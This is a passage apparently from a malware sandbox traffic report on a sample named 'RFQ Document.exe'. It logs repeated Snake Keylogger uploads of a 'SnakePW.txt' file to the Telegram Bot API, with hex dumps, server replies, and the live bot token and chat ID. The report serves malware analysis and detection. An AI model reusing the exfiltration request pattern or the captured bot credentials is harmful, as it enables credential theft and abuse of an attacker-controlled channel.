2021-09-28 05:58:58 UTC	201	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255d87ed04b Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:58 UTC	201	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 38 37 65 64 30 34 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255d87ed04bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:58 UTC	202	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:58 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:58 UTC	202	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 31 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 33 38 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12712,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808738,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
127	192.168.2.4	49926	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:58 UTC	203	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255d896a7dc Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:58 UTC	203	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 38 39 36 61 37 64 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255d896a7dcContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:58 UTC	203	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:58 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:58 UTC	204	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 31 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 33 38 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12713,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808738,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
128	192.168.2.4	49927	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:59 UTC	204	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255d8b3451c Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:59 UTC	204	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 38 62 33 34 35 31 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255d8b3451cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:59 UTC	205	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:59 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:59 UTC	205	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 31 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 33 39 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12714,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808739,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
129	192.168.2.4	49928	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:59 UTC	206	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255d8cb1d71 Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:59 UTC	206	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 38 63 62 31 64 37 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255d8cb1d71Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:59 UTC	206	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:59 GMT Content-Type: application/json Content-Length: 521 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:59 UTC	207	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 31 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 33 39 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12716,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808739,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.4	49787	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:23 UTC	20	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255c35d1eed Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:23 UTC	20	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 33 35 64 31 65 65 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255c35d1eedContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:23 UTC	21	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:23 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:23 UTC	21	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 35 39 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 33 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12592,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808703,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
130	192.168.2.4	49929	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:59 UTC	207	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255d8ff9058 Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:59 UTC	208	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 38 66 66 39 30 35 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255d8ff9058Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:59 UTC	208	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:59 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:59 UTC	208	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 31 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 33 39 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12717,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808739,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
131	192.168.2.4	49930	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:59 UTC	209	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255d917675e Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:59 UTC	209	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 39 31 37 36 37 35 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255d917675eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:59 UTC	210	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:59 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:59 UTC	210	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 31 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 33 39 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12718,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808739,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
132	192.168.2.4	49931	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:59 UTC	211	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255d93d8c91 Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:59 UTC	211	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 39 33 64 38 63 39 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255d93d8c91Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC 